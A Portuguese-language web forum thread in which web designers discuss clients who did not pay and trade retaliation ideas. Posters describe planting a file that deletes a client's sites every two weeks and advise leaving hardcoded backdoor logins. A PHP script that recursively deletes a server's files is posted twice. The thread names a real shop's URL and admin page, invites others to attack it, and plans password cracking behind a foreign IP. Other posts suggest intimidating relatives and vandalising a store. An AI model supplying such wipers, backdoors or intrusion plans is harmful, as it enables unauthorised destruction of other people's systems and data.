Webdesigner - calote
-
voce teria tambem os e-mails dele contratando seus serviços ou ja apagou????
tenho todos os emails dele. do orçamento que fiz, da aceitação dele, da forma de pagamento, da aprovação do layout, dos problemas com pagseguro/estoque que foram resolvidos e o porque deram problema (atualização dos servidores), cobrança, ele dizendo que iria pagar em novembro o restante…
tenho tudinho.
penso que os emails valem como prova. não foi possível assinar contrato porque o malandro mora fora, mas tem os emails.
a divida é o equivalente a 1 salario minimo, querendo ou nao é uma graninha.
já deletei o site rsrs. mas o fidaegua voltou, pelo menos a pagina html que fiz ele não conseguiu o backup, apenas da pagina index que redireciona para a loja ou site. a loja voltou, usando minhas artes, porem ele modificou o powered by , e como disse antes, ele ja tinha retirado minhas marcas do site.
outra coisa, tenho printscreen do site mostrando minha marca e autoria, além dos arquivos no meu computador e claro, os emails.
ele ja mudou a senha ftp rsrs
será que vale a pena dar um susto nesse camarada entrando com alguma ação de pagamento contra os familiares dele no juizado de pequenas causasó sem advogado por causa do valor. será que ele iria na área penal pelo fato de tirar o site? duvidas e duvidas, pq também vai muito da cabeça do juiz né.
-
acho que vale a pena outro tipo de susto.
depender de justiça não vira cara.
eu contrataria o gaucho pra dar um apavoro na familia desse fdp
-
vou numa dessas agencias de cobrança extra judicial
so quero ver a cara do povo
o endereço do site, www.eurotoysimport.com (link direto da loja www.eurotoysimport.com/lojabr)
ja dou a dica que o login é admin (www.eurotoysimport.com/lojabr/admin) só a senha que o cara mudou assim como do ftp.
-
tem um aqui do pp que me deu um calote… respectivo ao desenvolvimento do site em flash, com conteúdo administrável + 8 meses de hospedagem do site... até hoje não pagou. não com ação judicial, pois acredito que ele iria passar mais fome, já que não tinha como me pagar o site...
tive outro cliente que não pagou também, e mudou a senha do ftp... só esqueceu do banco de dados, apaguei umas 3x o banco de dados, e ele pegou na locaweb o ip e ligou ameaçando processar...
como possui painel administrativo o site, eu subi um arquivo que fiz...
a cada 15 dias os 4 sites dele saem do ar, pois os arquivos foram deletados. e borá ele lá pagar a locaweb pra dar restore, e não tem mais ip pra rastrear...
agora é assim, no meio dos sistemas tem algum arquivo de segurança...
-
por isso é sempre manter algum login e senha hardcode no site do cara…
aí não tem erro..hehehe
-
$dir = $_post[ dir ]; function apagar($dir){ if(is_dir($dir)) { if($handle = opendir($dir)){ while(false == ($file = readdir($handle))) { if(($file == . ) or ($file == .. )){ continue; } if(is_dir($file)){ apagar($file); } else{ unlink($dir. / .$file); } } } else { return false; } closedir($handle); rmdir($dir); } else{ return false; } } if( empty($dir)){ apagar( ../ .$dir); }
-
bem pensado realz
-
eu iria numa lan house, de preferencia em outro estado, alteraria os precos (tudo pra baixo) e soda-se.
sou da seguinte filosofia, todo mundo pode ter dificuldade financeira, mas, ter dificuldade é uma coisa e ser sem-vergonha é outra.
nesse caso, o cara esta sendo sem-vergonha, entao, com o meu (teu) dinheiro ele não fica. vai ter que gastar em outra coisa, nem que seja tendo que vender brinquedos com valor inferior ao que ele compra.
tem um cara aqui na minha cidade que me deve uns trocos. combinou 203498203 vezes comigo que iria pagar, acertar, etc. combinou, pela ultima vez, no dia 10 de dezembro e desde entao não consigo contato com ele. se até o final de janeiro não comecar a resolver (nem que seja 100 pila por mes), eu vou providenciar alguns prejuizos na loja dele. vitrine quebrada, porta torta, cola na fechadura, etc.. prejuizo ele vai ter, mas com o meu dinheiro, ele não vai ficar.
[]s
-
sai deste ramo por esse motivo.
antes eu ate fazia uns servicinhos de webdesign, para alguns chegados meus.
agora, soda era fazer eles pagarem. sempre entrava uma desculpa no meio. ai pulei fora.
realmente e uma area meio ingrata.
-
apagar/modificar tudo não róla em 5 minutos o cara sobe um backup e já eras porém é a unica maneira de tentar alguma retaliação… tenta trocar as senhas, excluir backups, para dificultar a vida do novo webmaster... mas no máximo em 1 dia eles já terão a senha de volta, backup que o server guarda e sua senha bloqueada...
negócios via net é um saco... fica de lição, fiado nem para o pai
-
$dir = $_post[ dir ]; function apagar($dir){ if(is_dir($dir)) { if($handle = opendir($dir)){ while(false == ($file = readdir($handle))) { if(($file == . ) or ($file == .. )){ continue; } if(is_dir($file)){ apagar($file); } else{ unlink($dir. / .$file); } } } else { return false; } closedir($handle); rmdir($dir); } else{ return false; } } if( empty($dir)){ apagar( ../ .$dir); }
como que funciona esse arquivo? ele é phpo salva como .php e só envia que o resto ele faz sozinho? como é?
o soda é que o fdp mudou a senha de acesso, ele que paga p servidor, hostnet, tá no nome dele, e lá só tem 1 senha e login de acesso, tanto via site hostnet pelo painel de controle quanto pro ftp dos programas.
deletei, mas como podem ver o cara voltou com alguns arquivos e tirou meu nome, porém n~]ao deixa de usar meus arquivos. e o site html já era, podem cliar que dá erro, pelo menos isso.
vou entrar com ação contra o cara mesmo, no juizado especial,que é de graça e não necessita advogado. são r$400,00 que me deve, e irei em cima da cunhada dele, sogra e sogra que moram aqui na minha cidade, pois possuo os dados dela que ele me forneceu, e lá na seção de conciliação se eles alegarem que não sabem (e farão isso) ai peço que eles forneçam a cópia do contrato social da empresa do cara e o conciliador/juiz depois resolva.
contratar advogado ele não farão. passei na porta da casa deles hoje, e que casinha caindo aos pedaços, carrinho velho, o valor da causa nem compensa advogado, mas caso eles contratem, eu já estarei super feliz pois estarei dando prejuizo pro cara.
já to largando esse ramo, so terminar 2 sites que tenho compromisso com eles, contrato assinado pois são da minha cidade e pronto.
na 1ª pagina tem o site do cara, quem souber ou quiser, podem arregaçar tudo. enquanto isso irei usar o tal de unsecure pra ver se descobre a senha do oscommerce, aí uso o ghost pra pegar um ip de israel e deleto tudo, até backup.
-
pow…
r$ 400?
ta se prostituindo?
hehehe
site simples é a partir de r$ 1000 aqui..
sem banco de dados nem nada..
-
pow…
r$ 400?
ta se prostituindo?
hehehe
site simples é a partir de r$ 1000 aqui..
to não cara, era um site simples em html e fazer umas configurações em alguns arquivos oscommerce para inserir banner, logo, essas coisas, coisa simples. tinha cobrado 650, ele pagou 214 e restam 436
sites complexos é no minimo 1000 também, senão nem ligo o pc.
-
pow…
r$ 400?
ta se prostituindo?
hehehe site simples é a partir de r$ 1000 aqui..
o último que eu falei isso me olhou como se eu tivesse dado um tiro no saco dele… queria pagar r$100,00
meu primeiro site, simples, sem flash, sem nada, só html+css, cobrei r$350,00 do meu sogro
-
caso resolvido.
disserte sobre